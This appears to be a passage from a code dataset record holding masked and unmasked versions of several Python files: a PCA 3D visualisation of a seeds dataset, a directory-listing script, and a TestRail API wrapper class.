2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
<|reserved_special_token_0|>
plt.clf()
<|reserved_special_token_0|>
plt.cla()
<|reserved_special_token_0|>
pca.fit(X)
<|reserved_special_token_0|>
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==
label, 2].mean(), name, horizontalalignment='center', bbox=dict(
alpha=0.5, edgecolor='w', facecolor='w'))
<|reserved_special_token_0|>
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
original = pd.read_csv('seeds.csv')
original['Class'] = original['Class'].apply(lambda x: transform(x))
X = original.drop('Class', 1)
y = original['Class']
fig = plt.figure(1, figsize=(4, 3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)
plt.cla()
pca = PCA(n_components=3)
pca.fit(X)
X = pca.transform(X)
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==
label, 2].mean(), name, horizontalalignment='center', bbox=dict(
alpha=0.5, edgecolor='w', facecolor='w'))
y = np.choose(y, [1, 2, 0]).astype(np.float)
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
<|reserved_special_token_1|>
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
from numpy.testing import assert_array_almost_equal
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import decomposition
from sklearn import datasets
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
original = pd.read_csv('seeds.csv')
original['Class'] = original['Class'].apply(lambda x: transform(x))
X = original.drop('Class', 1)
y = original['Class']
fig = plt.figure(1, figsize=(4, 3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)
plt.cla()
pca = PCA(n_components=3)
pca.fit(X)
X = pca.transform(X)
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==
label, 2].mean(), name, horizontalalignment='center', bbox=dict(
alpha=0.5, edgecolor='w', facecolor='w'))
y = np.choose(y, [1, 2, 0]).astype(np.float)
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
<|reserved_special_token_1|>
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
from numpy.testing import assert_array_almost_equal
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from sklearn import decomposition
from sklearn import datasets
def transform(x):
if x == 'Kama':
return 0
elif x == 'Rosa':
return 1
else:
return 2
original = pd.read_csv("seeds.csv")
original["Class"] = original["Class"].apply(lambda x: transform(x))
X = original.drop("Class", 1)
y = original["Class"]
fig = plt.figure(1, figsize=(4,3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)
plt.cla()
pca= PCA(n_components = 3)
pca.fit(X)
X = pca.transform(X)
for name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:
ax.text3D(X[y == label, 0].mean(),
X[y == label, 1].mean() + 1.5,
X[y == label, 2].mean(), name,
horizontalalignment='center',
bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))
# Reorder the labels to have colors matching the cluster results
y = np.choose(y, [1, 2, 0]).astype(np.float)
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral,
edgecolor='k')
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
plt.show()
# pca = PCA(n_components=3)
# pca.fit(df)
# U, S, VT = np.linalg.svd(df - df.mean(0))
# #assert_array_almost_equal(VT[:6], pca.components_)
# X_train_pca = pca.transform(df)
# X_train_pca2 = (df - pca.mean_).dot(pca.components_.T)
# #assert_array_almost_equal(X_train_pca, X_train_pca2)
# X_projected = pca.inverse_transform(X_train_pca)
# X_projected2 = X_train_pca.dot(pca.components_) + pca.mean_
# #assert_array_almost_equal(X_projected, X_projected2)
# loss = ((df - X_projected) ** 2).mean()
# print(loss)
# sse_loss = np.sum((df-X_projected)**2)
# print(sse_loss)
# print(pca.components_)
# print(pca.explained_variance_ratio_)
# # loadings
# loadings = pca.components_.T * np.sqrt(pca.explained_variance_)
# print(loadings)
# print(X_projected)
# print(len(X_projected))
# print(len(X_projected[0]))
# # We center the data and compute the sample covariance matrix.
# X_centered = df - np.mean(df, axis=0)
# cov_matrix = np.dot(X_centered.T, X_centered) / 569
# eigenvalues = pca.explained_variance_
# for eigenvalue, eigenvector in zip(eigenvalues, pca.components_):
# print(np.dot(eigenvector.T, np.dot(cov_matrix, eigenvector)))
# print(eigenvalue)
#np.savetxt("wdbc_ica.csv", X_projected, delimiter=",")
# print(pca)
# print(pca.explained_variance_ratio_)
# print(pca.singular_values_)
# print(len(pca.transform(df)))
# print(len(pca.transform(df)[0]))
|
flexible
|
{
"blob_id": "ef04e808a2a0e6570b28ef06784322e0b2ca1f8f",
"index": 4774,
"step-1": "<mask token>\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\n<mask token>\nplt.clf()\n<mask token>\nplt.cla()\n<mask token>\npca.fit(X)\n<mask token>\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==\n label, 2].mean(), name, horizontalalignment='center', bbox=dict(\n alpha=0.5, edgecolor='w', facecolor='w'))\n<mask token>\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\nplt.show()\n",
"step-3": "<mask token>\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\noriginal = pd.read_csv('seeds.csv')\noriginal['Class'] = original['Class'].apply(lambda x: transform(x))\nX = original.drop('Class', 1)\ny = original['Class']\nfig = plt.figure(1, figsize=(4, 3))\nplt.clf()\nax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)\nplt.cla()\npca = PCA(n_components=3)\npca.fit(X)\nX = pca.transform(X)\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==\n label, 2].mean(), name, horizontalalignment='center', bbox=dict(\n alpha=0.5, edgecolor='w', facecolor='w'))\ny = np.choose(y, [1, 2, 0]).astype(np.float)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\nplt.show()\n",
"step-4": "import numpy as np\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nfrom numpy.testing import assert_array_almost_equal\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import decomposition\nfrom sklearn import datasets\n\n\ndef transform(x):\n if x == 'Kama':\n return 0\n elif x == 'Rosa':\n return 1\n else:\n return 2\n\n\noriginal = pd.read_csv('seeds.csv')\noriginal['Class'] = original['Class'].apply(lambda x: transform(x))\nX = original.drop('Class', 1)\ny = original['Class']\nfig = plt.figure(1, figsize=(4, 3))\nplt.clf()\nax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)\nplt.cla()\npca = PCA(n_components=3)\npca.fit(X)\nX = pca.transform(X)\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n ax.text3D(X[y == label, 0].mean(), X[y == label, 1].mean() + 1.5, X[y ==\n label, 2].mean(), name, horizontalalignment='center', bbox=dict(\n alpha=0.5, edgecolor='w', facecolor='w'))\ny = np.choose(y, [1, 2, 0]).astype(np.float)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral, edgecolor='k')\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\nplt.show()\n",
"step-5": "import numpy as np\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nfrom numpy.testing import assert_array_almost_equal\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import decomposition\nfrom sklearn import datasets\n\ndef transform(x):\n\tif x == 'Kama':\n\t\treturn 0\n\telif x == 'Rosa':\n\t\treturn 1\n\telse:\n\t\treturn 2\n\n\noriginal = pd.read_csv(\"seeds.csv\")\noriginal[\"Class\"] = original[\"Class\"].apply(lambda x: transform(x))\nX = original.drop(\"Class\", 1)\ny = original[\"Class\"] \nfig = plt.figure(1, figsize=(4,3))\nplt.clf()\nax = Axes3D(fig, rect=[0, 0, 0.95, 1], elev=48, azim=134)\n\nplt.cla()\npca= PCA(n_components = 3)\npca.fit(X)\nX = pca.transform(X)\n\nfor name, label in [('Kama', 0), ('Rosa', 1), ('Canadian', 2)]:\n\tax.text3D(X[y == label, 0].mean(),\n X[y == label, 1].mean() + 1.5,\n X[y == label, 2].mean(), name,\n horizontalalignment='center',\n bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))\n# Reorder the labels to have colors matching the cluster results\ny = np.choose(y, [1, 2, 0]).astype(np.float)\nax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.spectral,\n edgecolor='k')\n\nax.w_xaxis.set_ticklabels([])\nax.w_yaxis.set_ticklabels([])\nax.w_zaxis.set_ticklabels([])\n\nplt.show()\n# pca = PCA(n_components=3)\n# pca.fit(df)\n\n# U, S, VT = np.linalg.svd(df - df.mean(0))\n# #assert_array_almost_equal(VT[:6], pca.components_)\n\n# X_train_pca = pca.transform(df)\n# X_train_pca2 = (df - pca.mean_).dot(pca.components_.T)\n# #assert_array_almost_equal(X_train_pca, X_train_pca2)\n\n# X_projected = pca.inverse_transform(X_train_pca)\n# X_projected2 = X_train_pca.dot(pca.components_) + pca.mean_\n# #assert_array_almost_equal(X_projected, X_projected2)\n\n# loss = ((df - X_projected) ** 2).mean()\n# print(loss)\n# sse_loss = np.sum((df-X_projected)**2)\n# print(sse_loss)\n# print(pca.components_)\n# print(pca.explained_variance_ratio_)\n# # loadings\n# loadings = pca.components_.T * np.sqrt(pca.explained_variance_)\n# print(loadings)\n# print(X_projected)\n# print(len(X_projected))\n# print(len(X_projected[0]))\n\n# # We center the data and compute the sample covariance matrix.\n# X_centered = df - np.mean(df, axis=0)\n# cov_matrix = np.dot(X_centered.T, X_centered) / 569\n# eigenvalues = pca.explained_variance_\n# for eigenvalue, eigenvector in zip(eigenvalues, pca.components_): \n# print(np.dot(eigenvector.T, np.dot(cov_matrix, eigenvector)))\n# print(eigenvalue)\n\n#np.savetxt(\"wdbc_ica.csv\", X_projected, delimiter=\",\")\n\n\n# print(pca)\n# print(pca.explained_variance_ratio_)\n# print(pca.singular_values_)\n# print(len(pca.transform(df)))\n# print(len(pca.transform(df)[0]))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for filename in os.listdir('/home/asket/Desktop/DBMS/menu'):
print(filename)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
mylist = []
clist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',
'South Indian']
for filename in os.listdir('/home/asket/Desktop/DBMS/menu'):
print(filename)
<|reserved_special_token_1|>
import csv
import json, os
mylist = []
clist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',
'South Indian']
for filename in os.listdir('/home/asket/Desktop/DBMS/menu'):
print(filename)
<|reserved_special_token_1|>
import csv
import json,os
mylist=[]
clist=["North Indian","Italian","Continental","Chinese","Mexican","South Indian"]
for filename in os.listdir("/home/asket/Desktop/DBMS/menu"):
print(filename)
|
flexible
|
{
"blob_id": "965db2523f60d83bd338bcc62ab8e5705550aa89",
"index": 6606,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor filename in os.listdir('/home/asket/Desktop/DBMS/menu'):\n print(filename)\n",
"step-3": "<mask token>\nmylist = []\nclist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',\n 'South Indian']\nfor filename in os.listdir('/home/asket/Desktop/DBMS/menu'):\n print(filename)\n",
"step-4": "import csv\nimport json, os\nmylist = []\nclist = ['North Indian', 'Italian', 'Continental', 'Chinese', 'Mexican',\n 'South Indian']\nfor filename in os.listdir('/home/asket/Desktop/DBMS/menu'):\n print(filename)\n",
"step-5": "import csv\nimport json,os\nmylist=[]\nclist=[\"North Indian\",\"Italian\",\"Continental\",\"Chinese\",\"Mexican\",\"South Indian\"]\nfor filename in os.listdir(\"/home/asket/Desktop/DBMS/menu\"):\n\tprint(filename)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
TestRail API Categories
"""
from . import _category
from ._session import Session
class TestRailAPI(Session):
"""Categories"""
@property
def attachments(self) -> _category.Attachments:
"""
https://www.gurock.com/testrail/docs/api/reference/attachments
Use the following API methods to upload, retrieve and delete attachments.
"""
return _category.Attachments(self)
@property
def cases(self) -> _category.Cases:
"""
https://www.gurock.com/testrail/docs/api/reference/cases
Use the following API methods to request details about test cases and
to create or modify test cases.
"""
return _category.Cases(self)
@property
def case_fields(self) -> _category.CaseFields:
"""
https://www.gurock.com/testrail/docs/api/reference/case-fields
Use the following API methods to request details about custom fields
for test cases.
"""
return _category.CaseFields(self)
@property
def case_types(self) -> _category.CaseTypes:
"""
https://www.gurock.com/testrail/docs/api/reference/case-types
Use the following API methods to request details about case type.
"""
return _category.CaseTypes(self)
@property
def configurations(self) -> _category.Configurations:
"""
https://www.gurock.com/testrail/docs/api/reference/configurations
Use the following API methods to request details about configurations and
to create or modify configurations.
"""
return _category.Configurations(self)
@property
def milestones(self) -> _category.Milestones:
"""
https://www.gurock.com/testrail/docs/api/reference/milestones
Use the following API methods to request details about milestones and
to create or modify milestones.
"""
return _category.Milestones(self)
@property
def plans(self) -> _category.Plans:
"""
https://www.gurock.com/testrail/docs/api/reference/plans
Use the following API methods to request details about test plans and
to create or modify test plans.
"""
return _category.Plans(self)
@property
def priorities(self) -> _category.Priorities:
"""
https://www.gurock.com/testrail/docs/api/reference/priorities
Use the following API methods to request details about priorities.
"""
return _category.Priorities(self)
@property
def projects(self) -> _category.Projects:
"""
https://www.gurock.com/testrail/docs/api/reference/projects
Use the following API methods to request details about projects and
to create or modify projects
"""
return _category.Projects(self)
@property
def reports(self) -> _category.Reports:
"""
https://www.gurock.com/testrail/docs/api/reference/reports
Use the following methods to get and run reports that have been
made accessible to the API.
"""
return _category.Reports(self)
@property
def results(self) -> _category.Results:
"""
https://www.gurock.com/testrail/docs/api/reference/results
Use the following API methods to request details about test results and
to add new test results.
"""
return _category.Results(self)
@property
def result_fields(self) -> _category.ResultFields:
"""
https://www.gurock.com/testrail/docs/api/reference/result-fields
Use the following API methods to request details about custom fields
for test results.
"""
return _category.ResultFields(self)
@property
def runs(self) -> _category.Runs:
"""
https://www.gurock.com/testrail/docs/api/reference/runs
Use the following API methods to request details about test runs and
to create or modify test runs.
"""
return _category.Runs(self)
@property
def sections(self) -> _category.Sections:
"""
https://www.gurock.com/testrail/docs/api/reference/sections
Use the following API methods to request details about sections and
to create or modify sections.
Sections are used to group and organize test cases in test suites.
"""
return _category.Sections(self)
@property
def shared_steps(self) -> _category.SharedSteps:
"""
https://www.gurock.com/testrail/docs/api/reference/api-shared-steps
Use the following API methods to request details about shared steps.
"""
return _category.SharedSteps(self)
@property
def statuses(self) -> _category.Statuses:
"""
https://www.gurock.com/testrail/docs/api/reference/statuses
Use the following API methods to request details about test statuses.
"""
return _category.Statuses(self)
@property
def suites(self) -> _category.Suites:
"""
https://www.gurock.com/testrail/docs/api/reference/suites
Use the following API methods to request details about test suites and
to create or modify test suites.
"""
return _category.Suites(self)
@property
def templates(self) -> _category.Template:
"""
https://www.gurock.com/testrail/docs/api/reference/templates
Use the following API methods to request details about templates
(field layouts for cases/results)
"""
return _category.Template(self)
@property
def tests(self) -> _category.Tests:
"""
https://www.gurock.com/testrail/docs/api/reference/tests
Use the following API methods to request details about tests.
"""
return _category.Tests(self)
@property
def users(self) -> _category.Users:
"""
https://www.gurock.com/testrail/docs/api/reference/users
Use the following API methods to request details about users.
"""
return _category.Users(self)
|
normal
|
{
"blob_id": "c2467e94a2ad474f0413e7ee3863aa134bf9c51f",
"index": 3399,
"step-1": "<mask token>\n\n\nclass TestRailAPI(Session):\n <mask token>\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n <mask token>\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n <mask token>\n <mask token>\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestRailAPI(Session):\n <mask token>\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) ->_category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) ->_category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) ->_category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestRailAPI(Session):\n <mask token>\n\n @property\n def attachments(self) ->_category.Attachments:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/attachments\n Use the following API methods to upload, retrieve and delete attachments.\n \"\"\"\n return _category.Attachments(self)\n\n @property\n def cases(self) ->_category.Cases:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/cases\n Use the following API methods to request details about test cases and\n to create or modify test cases.\n \"\"\"\n return _category.Cases(self)\n\n @property\n def case_fields(self) ->_category.CaseFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-fields\n Use the following API methods to request details about custom fields\n for test cases.\n \"\"\"\n return _category.CaseFields(self)\n\n @property\n def case_types(self) ->_category.CaseTypes:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/case-types\n Use the following API methods to request details about case type.\n \"\"\"\n return _category.CaseTypes(self)\n\n @property\n def configurations(self) ->_category.Configurations:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/configurations\n Use the following API methods to request details about configurations and\n to create or modify configurations.\n \"\"\"\n return _category.Configurations(self)\n\n @property\n def milestones(self) ->_category.Milestones:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/milestones\n Use the following API methods to request details about milestones and\n to create or modify milestones.\n \"\"\"\n return _category.Milestones(self)\n\n @property\n def plans(self) ->_category.Plans:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/plans\n Use the following API methods to request details about test plans and\n to create or modify test plans.\n \"\"\"\n return _category.Plans(self)\n\n @property\n def priorities(self) ->_category.Priorities:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/priorities\n Use the following API methods to request details about priorities.\n \"\"\"\n return _category.Priorities(self)\n\n @property\n def projects(self) ->_category.Projects:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/projects\n Use the following API methods to request details about projects and\n to create or modify projects\n \"\"\"\n return _category.Projects(self)\n\n @property\n def reports(self) ->_category.Reports:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/reports\n Use the following methods to get and run reports that have been\n made accessible to the API.\n \"\"\"\n return _category.Reports(self)\n\n @property\n def results(self) ->_category.Results:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/results\n Use the following API methods to request details about test results and\n to add new test results.\n \"\"\"\n return _category.Results(self)\n\n @property\n def result_fields(self) ->_category.ResultFields:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/result-fields\n Use the following API methods to request details about custom fields\n for test results.\n \"\"\"\n return _category.ResultFields(self)\n\n @property\n def runs(self) ->_category.Runs:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/runs\n Use the following API methods to request details about test runs and\n to create or modify test runs.\n \"\"\"\n return _category.Runs(self)\n\n @property\n def sections(self) ->_category.Sections:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/sections\n Use the following API methods to request details about sections and\n to create or modify sections.\n Sections are used to group and organize test cases in test suites.\n \"\"\"\n return _category.Sections(self)\n\n @property\n def shared_steps(self) ->_category.SharedSteps:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/api-shared-steps\n Use the following API methods to request details about shared steps.\n \"\"\"\n return _category.SharedSteps(self)\n\n @property\n def statuses(self) ->_category.Statuses:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/statuses\n Use the following API methods to request details about test statuses.\n \"\"\"\n return _category.Statuses(self)\n\n @property\n def suites(self) ->_category.Suites:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/suites\n Use the following API methods to request details about test suites and\n to create or modify test suites.\n \"\"\"\n return _category.Suites(self)\n\n @property\n def templates(self) ->_category.Template:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/templates\n Use the following API methods to request details about templates\n (field layouts for cases/results)\n \"\"\"\n return _category.Template(self)\n\n @property\n def tests(self) ->_category.Tests:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/tests\n Use the following API methods to request details about tests.\n \"\"\"\n return _category.Tests(self)\n\n @property\n def users(self) ->_category.Users:\n \"\"\"\n https://www.gurock.com/testrail/docs/api/reference/users\n Use the following API methods to request details about users.\n \"\"\"\n return _category.Users(self)\n",
